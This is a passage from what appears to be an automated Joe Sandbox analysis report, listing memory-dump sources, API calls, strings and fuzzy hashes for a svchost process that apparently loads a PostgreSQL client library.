                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: (null)
                                                                                            • API String ID: 2918714741-3941151225
                                                                                            • Opcode ID: 07fed7616e3a56c82322c18febf21bee99f285bf009ae68b25a5bd7017957771
                                                                                            • Instruction ID: f4cb3767bc909d92eb5ccaf2d110522b8286ec571c89d9493e6b430060b1fbac
                                                                                            • Opcode Fuzzy Hash: 07fed7616e3a56c82322c18febf21bee99f285bf009ae68b25a5bd7017957771
                                                                                            • Instruction Fuzzy Hash: CC51E462B0EAC14AF724CF16B450369BBD2EB89794F489131CA8D537A6DE3ED042CB04
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: qsort
                                                                                            • String ID: CP437
                                                                                            • API String ID: 1928336220-2110281557
                                                                                            • Opcode ID: 4b575217914c229fa3baac5c6b83875f0a4f44436d4fc877355de5328b9c1cca
                                                                                            • Instruction ID: ad68cacdd32ef68dfc225230e7c63045a68a48554a04fc757c47b7813bb30f08
                                                                                            • Opcode Fuzzy Hash: 4b575217914c229fa3baac5c6b83875f0a4f44436d4fc877355de5328b9c1cca
                                                                                            • Instruction Fuzzy Hash: 2D31F3B3B29A4186EF10CF96EC14B9AFBA6F755BC9F898036DD0907710DA3AC156C700
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A6A,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D92D6
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A6A,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D92DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfree
                                                                                            • String ID: out of memory
                                                                                            • API String ID: 1865132094-2599737071
                                                                                            • Opcode ID: 57c80bfd9c969e103fb3ce411b1eb1d7baa43ee6e9a46ea25e009e22ddf0c3c9
                                                                                            • Instruction ID: 4d71f2d9ae9c0b3f5a7ca0dcb2482654a65a3baaac07334061cf4ec913d2c991
                                                                                            • Opcode Fuzzy Hash: 57c80bfd9c969e103fb3ce411b1eb1d7baa43ee6e9a46ea25e009e22ddf0c3c9
                                                                                            • Instruction Fuzzy Hash: 95214D26B1AB8281FAA48F52A16037577A2EB45BC4F0C6035DE4D6775AEE3EE441C708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __acrt_iob_funcstrncpy
                                                                                            • String ID: WARNING: sslpassword truncated
                                                                                            • API String ID: 238952937-152383654
                                                                                            • Opcode ID: 57e208369fac4125e9a644b43e5d44808023319e1ee4e83fd80ee9f620568ffd
                                                                                            • Instruction ID: 4a74da5b1da01b78e1c9ad5513b576506915395cf6253023966283eb1b0a73d2
                                                                                            • Opcode Fuzzy Hash: 57e208369fac4125e9a644b43e5d44808023319e1ee4e83fd80ee9f620568ffd
                                                                                            • Instruction Fuzzy Hash: 3121F522B0AB8185F7509B1AB450269A762EB45BE4F1C2230DF5E177DACF7ED4828304
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DDDF2,00000000,?,00000000,00007FFDA36DDA51), ref: 00007FFDA36E02F7
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DDDF2,00000000,?,00000000,00007FFDA36DDA51), ref: 00007FFDA36E02FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: mallocrealloc
                                                                                            • String ID: PGresult cannot support more than INT_MAX tuples
                                                                                            • API String ID: 948496778-782348856
                                                                                            • Opcode ID: 930dd4e4782057fd6c1d2e89aa03dc5a7a7104af9cfb9d2bb88b4f0452e449ea
                                                                                            • Instruction ID: 77a85e1be13a25ddce07c6812ef915e614017444097e3c308e82d69d868165e7
                                                                                            • Opcode Fuzzy Hash: 930dd4e4782057fd6c1d2e89aa03dc5a7a7104af9cfb9d2bb88b4f0452e449ea
                                                                                            • Instruction Fuzzy Hash: 7D218372B0AB42C6FA148F16E060178A3A2FB54B80B3C5531DA5DA7356DF3DD456C708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __acrt_iob_funcstrncpy
                                                                                            • String ID: WARNING: sslpassword truncated
                                                                                            • API String ID: 238952937-152383654
                                                                                            • Opcode ID: 37de99b39b668d6341e98231ed23e357f6566f7912e7a45ebc3c6ddf0a545320
                                                                                            • Instruction ID: a58d92583bf5e62d63e26beaf622e5e0fe493b66737a9eaae85ce69afa194ad7
                                                                                            • Opcode Fuzzy Hash: 37de99b39b668d6341e98231ed23e357f6566f7912e7a45ebc3c6ddf0a545320
                                                                                            • Instruction Fuzzy Hash: B9116321B0AB8585F7509B15B4A03796792FB4ABE4F1C2230DF9E57796CF3ED4868304
                                                                                            APIs
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E2253,?,?,?,?,?,?,show password_encryption,00007FFDA36DB0A5), ref: 00007FFDA36E1D46
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E2253,?,?,?,?,?,?,show password_encryption,00007FFDA36DB0A5), ref: 00007FFDA36E1D99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: realloc
                                                                                            • String ID: cannot allocate memory for output buffer
                                                                                            • API String ID: 471065373-1435837941
                                                                                            • Opcode ID: 9772881e1c64637cd21e2e420743611e98e768787acaeea38add0a32b9479228
                                                                                            • Instruction ID: 42ec07a1cc72a99b64f0ce5ae41b2dfddf6e9b8280bef1856cf13109d1d147a0
                                                                                            • Opcode Fuzzy Hash: 9772881e1c64637cd21e2e420743611e98e768787acaeea38add0a32b9479228
                                                                                            • Instruction Fuzzy Hash: 4811B622B16B8183FB648F55F4A036AA252FF44BC0F0C6131E75D17796EF6DE4448304
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DCAE3
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                              • Part of subcall function 00007FFDA36EBD40: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EBD58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfreemalloc
                                                                                            • String ID: PGresult is not an error result$out of memory
                                                                                            • API String ID: 3985033223-3630110109
                                                                                            • Opcode ID: 9e53c121f6d4eb1b885a78657c011e8ee84612e85442a61ba8fc4b3a20d8aaf4
                                                                                            • Instruction ID: 07025f065fd6dd5fc11ae5214d47a4ca9cf595f47615502c81b04cbd3761b75e
                                                                                            • Opcode Fuzzy Hash: 9e53c121f6d4eb1b885a78657c011e8ee84612e85442a61ba8fc4b3a20d8aaf4
                                                                                            • Instruction Fuzzy Hash: CC01E523B0DA8682FA20CB05F060169A361FFC4BD0F4C1131EE4E63B5ADE6DD9458B04
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32 ref: 00007FFDA36D314F
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFA8
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFE0
                                                                                              • Part of subcall function 00007FFDA36EBF90: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EC079
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$FormatMessagerealloc
                                                                                            • String ID: %s: %s (%x)$%s: SSPI error %x
                                                                                            • API String ID: 3717000109-2285168158
                                                                                            • Opcode ID: 5db511b980a8cbb20cd3963e3259cd84e9b3694283f0e42cd4f45bad40790d0b
                                                                                            • Instruction ID: 3ece851bf656cc278148bbdb20ae659eada562f5619ed77bd014211327c1e5bb
                                                                                            • Opcode Fuzzy Hash: 5db511b980a8cbb20cd3963e3259cd84e9b3694283f0e42cd4f45bad40790d0b
                                                                                            • Instruction Fuzzy Hash: 3E01D232B1AA8282F7208B55E8217E67762FF887C8F481035EA4C17B66DF3DD405CB08
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: M_construct_endM_construct_uint32
                                                                                            • String ID: mode
                                                                                            • API String ID: 3782155166-2546616235
                                                                                            • Opcode ID: 1c1a152bfd3b3512593df79d7ec5de0e47f139f25948413791f2350153563ce1
                                                                                            • Instruction ID: d9cc37091740b9a05d824b399273e68686c13d2c1cf8d7c61c38b150bde30e68
                                                                                            • Opcode Fuzzy Hash: 1c1a152bfd3b3512593df79d7ec5de0e47f139f25948413791f2350153563ce1
                                                                                            • Instruction Fuzzy Hash: 7B110D22909BC486E3228F38D0512E9B771FBD9788F449261DB8D1725BEF28D1C5DB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: NoticeResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-1096294206
                                                                                            • Opcode ID: 042305df349cd53864de0ec0bc1164dcf867d594b70c2fffbf240a790311e358
                                                                                            • Instruction ID: 30849ac2a5cd467965b78c6bca181862795bc02a9463b78318e9a858c93af40b
                                                                                            • Opcode Fuzzy Hash: 042305df349cd53864de0ec0bc1164dcf867d594b70c2fffbf240a790311e358
                                                                                            • Instruction Fuzzy Hash: FA01D17271A68682F651CB15F061BE96362EB847D8F482032EF0E17756CF3ED58AC718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmpstrtoul
                                                                                            • String ID: INSERT
                                                                                            • API String ID: 3007069910-542497690
                                                                                            • Opcode ID: 15447babf44f5e002d2705c48ed06f6a3f34c2e22d3b932a3b2d8c3c33783d55
                                                                                            • Instruction ID: e30ddabc31dff159a73330c3466dc0d91765be04659d10f1866670533b05b0d0
                                                                                            • Opcode Fuzzy Hash: 15447babf44f5e002d2705c48ed06f6a3f34c2e22d3b932a3b2d8c3c33783d55
                                                                                            • Instruction Fuzzy Hash: A3F0F012F2BA4341FF909B6598317352752EF50B84F0C3430C98D56386EF1ED4498344
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: PortalSuspended$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3028255369
                                                                                            • Opcode ID: 6abfe9258297e4a93dcf2281509757e0a29289b16473b74458a6a101103af6d8
                                                                                            • Instruction ID: 52c4f3da29594c6ec52460be6668071e0f4f6cb3cbb5ff7341aa6245eec28be4
                                                                                            • Opcode Fuzzy Hash: 6abfe9258297e4a93dcf2281509757e0a29289b16473b74458a6a101103af6d8
                                                                                            • Instruction Fuzzy Hash: 56F09072B1A54682FA50DB15F061BF92362EB807DCF482032DE0E17342CE3ED59AC708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: EmptyQueryResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3205523542
                                                                                            • Opcode ID: acbf788f0638779820dcd1786c7ac39cda0842c07abf6d166f1c963db8a3d596
                                                                                            • Instruction ID: 4cc3f21a12dcd36c8fd8a1f22f53d737d7b8c95b903d890cbbcbdcee82fef090
                                                                                            • Opcode Fuzzy Hash: acbf788f0638779820dcd1786c7ac39cda0842c07abf6d166f1c963db8a3d596
                                                                                            • Instruction Fuzzy Hash: 7AF06D62B1A54686FA50DB15E062BA92362EB807D8F482032DE0E17342CE3AD59AC708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: NoData$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3740840261
                                                                                            • Opcode ID: a2b42f46eddf8d4c2eb8fb75d465949b90df4443478b4bc0297e8268bc8038a2
                                                                                            • Instruction ID: 29efca8f07d2bc628507c93ce8bc35915ea1c0b2f6c9f15a3be216b0f5c4ac30
                                                                                            • Opcode Fuzzy Hash: a2b42f46eddf8d4c2eb8fb75d465949b90df4443478b4bc0297e8268bc8038a2
                                                                                            • Instruction Fuzzy Hash: 65F06D62B1A54682FA50DB15E162BA92362EB80798F482032DE0E17346CE3ED59AC708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: Terminate$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-186112465
                                                                                            • Opcode ID: 6e547a04957a3293cd69399558c4b2cf10434273b90da3d874882b27262b1d6e
                                                                                            • Instruction ID: 81e6404683ca130aab5b6c741836763d7fc0a52446b235ae7787dbc9eeb7cb82
                                                                                            • Opcode Fuzzy Hash: 6e547a04957a3293cd69399558c4b2cf10434273b90da3d874882b27262b1d6e
                                                                                            • Instruction Fuzzy Hash: 0CF09072B1A55682FA50DB15F061BF92362EB807DCF482032DE0E17342CE3ED59AC718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: CopyDone$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-165533431
                                                                                            • Opcode ID: 9c63d00afaad61cc0f5a37ab35828e7a7f37dfbdef257d42c3dc26f7b9b03bba
                                                                                            • Instruction ID: d618edd037c781dff4e674c2be66b00b38df1c7ebef836c7c3c0811a517dce0c
                                                                                            • Opcode Fuzzy Hash: 9c63d00afaad61cc0f5a37ab35828e7a7f37dfbdef257d42c3dc26f7b9b03bba
                                                                                            • Instruction Fuzzy Hash: 9FF09072B1A54682FA50DB15F061BF92362EB807DCF482032DE0E17342CE3ED59AC718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: CloseComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-2521192578
                                                                                            • Opcode ID: 5247143c61b43af720aa10091ab06a6398bd60e1cd0a298573e7d4618f1d8d08
                                                                                            • Instruction ID: 90abab5100cb3bd4b7a501ae5cf8e57cdf6240d1aee9d6b5dd48441cf336dfca
                                                                                            • Opcode Fuzzy Hash: 5247143c61b43af720aa10091ab06a6398bd60e1cd0a298573e7d4618f1d8d08
                                                                                            • Instruction Fuzzy Hash: 9AF06D62B1A54682FA50DB15E061BA92362EB80798F482032DE0E17342CE3AD59AC718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
